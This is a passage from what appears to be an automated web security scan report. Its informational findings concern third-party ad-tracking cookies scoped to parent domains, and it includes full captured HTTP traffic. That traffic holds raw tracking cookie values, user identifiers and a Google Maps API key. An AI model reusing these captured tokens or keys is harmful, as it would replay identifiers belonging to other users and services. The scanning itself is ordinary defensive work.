2Xm3zrYMwi+JWTTN5BEC2oVUSOm+DkjDwDmlS4Hz9eUiaKuXCh6blZMbaXYlUK/GFNSVdp4EYXMfrfMLBceVCXTfe7LQZqqhrfNmKNvC2WIs0eIzQTSgkyE36ExeASfIYxBgagH66xfGtChImtoAnNoskXmGUXrmuWJmr2n1DqtIW+/IFRaM6JfhifD3SjlKJmiTEmZjhIc3K+uW15qQX524DCQnzR2ZX4FEn4rclF5DjvL1rv+5FREvo9+qJBWm74HUesCoVStJe7UHxiSWA/7iGfZxRgTU9xrnI6nbxd57VGB+iMH6MYCJXx95CX61m0Chvi/BS14Kl+oYDdVzCRyzwqTU7ykQ1TCtHEsLTUSPnT/sp0BifI4+ITf1Cd8GjptO34kHnY+9erfMTd5pz7fQ91twXO4NBBrUhsuTCebHYMH7rlZ2gInE5iHG0sCBWhVQeqml5PtdICBJDbucuytN+yARfx0cgwFpuryaNN823YEwkwmuy42AbSkyYymy+UGkDe3iq9KhhcXsjXekJcNnCY4e0ggZYe0eDC7OrNjnGppcRcRfNmlUmHFWJ0t5iS/8rFZ7r9nqV3L+Ks+k/Bfw04L6cYnyIU8Ft9vb6Q+YFJ+MIsfKIP19v/KvwZ4huw5xfbVWRKmP1LGRwCzp0KpZWvnOu/5LBgEIurRKFkr9C0OlRtK9YahWGUHb295fCsejDj9h6ITQdvtk1gdUtdd146g/fAwBiThZSrnTvQtfx1hoOTfOMmfS3Iu8AOgikXw8fJIq24TTJK/JfU/Kle1+vzZrBlMFh5Afh1qja0MHBO6o+I1PtKJQkEvLHnUFNuI1LX3W76LssPpRcxqeQ0ico/22esLnjurcGcDzkCt8bxzJ0XCy/hxiYaQZj2c4odprBmARwbAGMFZ8XvyF9xuey67n6bQ9ndxHRkFxXSB8dj6BtCWdaj26k4HJebjrba5UFlvfK/uYH+hSNaB5lc8Lpoo34WHmy+EwTtbDTZe8sX09JNOtDEt7CSh7a5ud1hDn0gOtf6iySYsT7jV2PnEs4dkVQ8ICOwhNBN2tYE95VOLcCOn36yldnpYLJbjXs58A7OAHop2IpDc4m8280xku0k8oHIeR5AC5BKl+RhW5IMqrDwA8arsFlx/IxAe6T991EglpgFwoUTNNOKD39is3z9p5xBjEuwn0SIYIO/65chkmsaj0lw74GfX4hNA3WhKg==; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NC8JZjpr3hepMJpsGd7ZVglywUUUvJuj5VZ2CE0t8dfV5LwaUQjNwVbd1KDsr77b16gERAB5waljbHAN6H98Pl0AhsBm+/8/n4kBAKNvbGggCQBQCKFjwO/4vNXlthu+mZudlKzcvg2eD0PWpTrOGzZmDhy+kT1EmcwBoAO0IKtoEgPyuRXsrKhjAPdfOqp1WY2DrEwqBJauu/w5tyh+BT9TzPYbaJrEufdJZOhzK/ze/4INKhyYkuK043aby26fhjo1fRPvQfg8Vv9ky31mCuwE2rn7zHOg9uUTIR9/pT+2Q1cNcL2sBgO2QKXWJUHA0GoPCnCuTu4FXIceSN86XOvYLtaDGb/VE3/cWEa5h+xLU/n1eRAWVNpONAcc8IVRrB3yeJ+KZN3OVRWFiTolD4d3Q8UaXRlyCCjx/p+9x7pkknB2pF7nnL/SmYr2Lwjns5uaNn1lO0BlYt1u9k1UDPZSahS4NFOuD3X7Z5sqpUTrt4mKNQSJi4y9vt051ZS0wALkL1C0RPG1PmP3SYnWNvGCkLyo687UCx7dnLLq3YM2Jf98NxWkSunKBwuza1h43Y+vH2Bpt/cCUySR+dYMe9BO5npHhLxmC5mqL9dUOwlx16FRiJl2J98XY1lkRTF3T4F3eP+K3/BSXRJVMGHbX5U7MkXwp2xFhrmN4IvwhCjXOUYPuMOXAkZdv1pAEzw/DPAosnP9wPXrDue1sA1RI0N90Ohj/cQIHkT9B2IKlnJUzb+ZwBq7LMhDN0uh2H+F2T/IPQM8Kb8cPmV36Ob6LJGyvSJW7JlTQPJbnJrHWuYc/f8oc1hOALQN1Uh3yf7Ttj9AjZg8L2p/XRPHZooO2apNxEVKh9IITo1syr0JzfL9xVF/mdaXIcTytwEWVcX8z+P+GimfPZDdpXVtm6bNTVaRwiAtECRbgIwqHinNlb6kYt5dvK5n3gpnddFIIx6JUu99J8AmRXTwOmFiplx4GT5tbsXq6MRCZ6YoegbYXQtj9uuSZY/aVe8bIoKBgB40J2xpeACsFVdmudeB9yPdJbGhAuE2tc6hB8iQ0tKRVP0DfEAn5r/MnT5QbieDGHG2/yzv1qvm6NtoCZnilGVcciWqVvbwutNO4pGGWhC8E+oCe3Iqgcr4x+AP0bWSXCBf68XSjr3AyN62bAor0Dk1J9FAbXW9n7wvgQGxi6YrNuupRHSk3JnEjRwwFfq6wHwnF94B9We6QFXJY1ME6z6t2mKyVJBEcuuoLF2cnfBLokoHsm9TyeNXvGUQ6wdYC1AjzJVIFdFPsWKKK5OidfKjVBnGRyasdUPinEXieAmNfxMPANj+005urzTjHzAqPGSxIS31eC04uTJ+TSVEF5ww9PPNQHdBDjcbIwwuREREsUZDTmZiikJKGA6HzdIjgDSIrEzNpjwxQJvJ71PMSxdc0m+0PApKF46AMpju8YcoicKsjnMDKIuSbXRYc14=; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:25 GMT; Path=/
Last-Modified: Tue, 19 Jul 2011 16:02:25 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 19 Jul 2011 17:02:25 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:25 GMT
Content-Length: 5953

//AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC)
var rsi_now= new Date();
var rsi_csid= 'C07583';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

13.76. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d3957719BE8F34A5DA51D204E7E06704A%7cEANON%3dA%253D0120022nZOEvsWG4cdC9mqZ0E3fugcCxJk8E2sEKwCETBPlId0tyuvg4lUa6XfTAIF-9ayVYkENmoj3ol2zmnbUSkZd6X%2526E%253Db48%2526W%253D1%7cNAP%3dV%253D1.9%2526E%253Daee%2526C%253D1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg%2526W%253D1 HTTP/1.1
Host: m.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=160&height=600&pb=340&cb=8014375&referrer=
Cookie: uuid2=7212282717808390200; icu=ChII1LEDEAoYASABKAEwu9mX8QQQu9mX8QQYAA..; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`9N16/A@62N!Q.2s=Ac+OBmJhP_oR<_TyZVw>RTOLn3<LqI4'Re#$=p4'AIQo@#P#Vcnd)nEfl3!*RKTYEy<t; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:49:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:49:01 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:01 GMT

GIF89a.............!.......,........@..L..;

13.77. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAHjOizKxN3j2yyJbuGOLs0hSEzOL_OikNPvVpm0ynWQuaOLPCJRTyZcUWYx2cYT4gRtYy4kNqIbxYmw HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=ee9b3b8ecc4b4ec2:TM=1311109135:LM=1311109135:S=cayOe7PfiMmmwdYV; expires=Thu, 18-Jul-2013 20:58:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Tue, 19 Jul 2011 20:58:55 GMT
Server: mfe
Cache-Control: private
Content-Length: 10101
X-XSS-Protection: 1; mode=block
Expires: Tue, 19 Jul 2011 20:58:55 GMT

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

13.78. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=24432;evt=17182;cat1=21312;cat2=21313;rand=43948 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BxIAAACYkAROIAYGAAFJAABAYSAHIAtAAACV4AIXAIbgAhcDP8zXTUAfQC8B9FkgB0AMIAAAAuACFwDN4AIXAcPL4AEvAWla4AEvALHgAhcByGDgARcAoOACFwG0ViBXIFtAAAA44AIXAetc4AEXADHgAhcB+1/gAUcAJOACFwDY4AJfAAPgAhcANuACLwHcyuABpwDT4AK/ANngAhcAPuACvwDT4AIXAIwhQcCnANDgAhcBR1PgAY8AzOACFwGiUuABFwDJ4AIXAOPgAo8BbLHgAY8EzU8AAApBBAIAAAA=; lyc=CgAAAATKGAdOACAAAd1YIASgAAQDSAAAteAKFwaqUQAAVpQEYC8BvUSgLCAABnlXAAB47gNgFwFwXyAQoAAHQVMAAMD19U1ADgG0R0AFgAAASiAGARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcBUFvgARkGpUwAAO/s52AXAWhW4AEXAaFF4AELAJXgAi8DJE0AAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:24:02 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CwAAAASniB1OACAAAZVbIASgAAYkTQAAyhgHYBcB3VigFCAABANIAAC14AoXBqpRAABWlARgLwG9RCAooAAGeVcAAGB3JWAXAXBfoBQgAAZBUwAAwPX1IGUDAAC0RyAEoAAASiAHARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcAUOACvwalTAAA7+znYBcBaFbgATEBoUXgAQvgBY8BAAA=; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT

GIF89a.............!.......,...........D..;

13.79. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html&srcUrl=http%3A%2F%2Fwww.boston.com%2Fbusiness%2Fticker%2F&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=40506&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&apv=false&rand=0.39396007347768847&sig=s_ppv HTTP/1.1
Host: odb.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311108255065; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
Set-Cookie: _lvd2="iYJQahqaNoybZPBlL1y+oQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Tue, 26-Jul-2011 09:32:15 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
Set-Cookie: recs-ad82f50455df441759d1d8530ecdbaac="QHChs7CRExG12Ow/i/bhLoTOUAVA7ck9pHYzRgDMxFx+vgba/12gWJv6sgRAr7jYeFcfE+OdrabgVFZDw9TGi+6jLuHWn5mlULTTird7SsSJakbqdZgl2fl7pZFJ8vmZeVMaUm5Ix9l5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 20:49:15 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:14 GMT
Content-Length: 9127

outbrain_rater.returnedOdbData({'response':{'exec_time':16,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'218543332','req_id':'1f90121845ccabe94998d7832ea7afec'},'score':{'preferred
...[SNIP]...

13.80. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=db87fbb1-7ab7-43ef-8be9-04bf8c66111d&_ct=pixel&REDIR=http://a.collective-media.net/datapair?net=vt HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: bbid=AF3T0ZtvfNiS8n5ute4V6MxOq7wh9gs1wNTf-pOwShyGtPc05ECIyf18y-IKKgFQ_phFyOae3m-BfPHqrP1WJ_dHlkRfc-7LJvpeFml7opJiEzAyW-1PPXs; BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 20:49:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 20:49:02 GMT
Set-Cookie: BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a; Domain=.brilig.com; Expires=Thu, 11-Jul-2041 20:49:02 GMT
Location: http://a.collective-media.net/datapair?net=vt
Content-Length: 0
X-Brilig-D: D=3656
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain


13.81. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /C07583/b3/0/3/1008211/494237794.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /C07583/b3/0/3/1008211/494237794.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.gamestop.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=C07583 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=MLun+AU1Zjhl58oJicYDKGOoh+glpORtThzANG1aBfZBrT1crkG1BbCYM408CuN9lQbF3aP4vgOJ1mIVRcbsqnd9em7gDHA1TIoEl2KoI2SgU4DA5EF1lXVsqfuVtURUfDlRbGMIwrPXqkTQ7ha/uqz9AYieh57Wl1R1Y1jVlCJtFijCZov3GG+/HzEWJJFPsshjNe+eXiR9QaN+nFIQwIuAnqrWN6OLs2utUQX1qLlAizz5SX1DY4ezfOcpkCrgkFCpWD1jpxUFSBd9kT0QO8lfwgL+MKkmgv9YurmtGVl4mgRDUrqi4EV2vm7677NG43lfljF81/2h3UQcvWTCROqFLqGTTGw9i7uhLLM9wmD6qiJYd+A504GkQmipymnz4zz+KJVBtht6ODBDRjch1v/Q9H0EVzkVdMH7LlvacBN6xVxFpq0/5sv3kFv9nQqHAD638rIvnoV5vHJmPEsSTPDQprR3Cqi6aS3z3efJB5Fe7NRa2Wxaw2lEgG+sN2BcFPE3dtH/7Hw70JwZoyPxbdbklPDPhWAaH0Q2BIFPO8C3p6hVpULE/9z53nAuqfuY4vymzFXDyY9vGdOvfsfoNe9C0w+FabpojVLoaKoHptlOSMDYPZV/Tmm8gD0qbz9Ql+737ttzGuAFouNSyp3mTuINVV/NGeiFZ/hPZyCj17mR7wGzyRp2a2Ayh6cUWQItrXRbEO4q19f7HHQfrXQmkxlZVigNiwD9Adfyt3Ltb9FpXu0LHv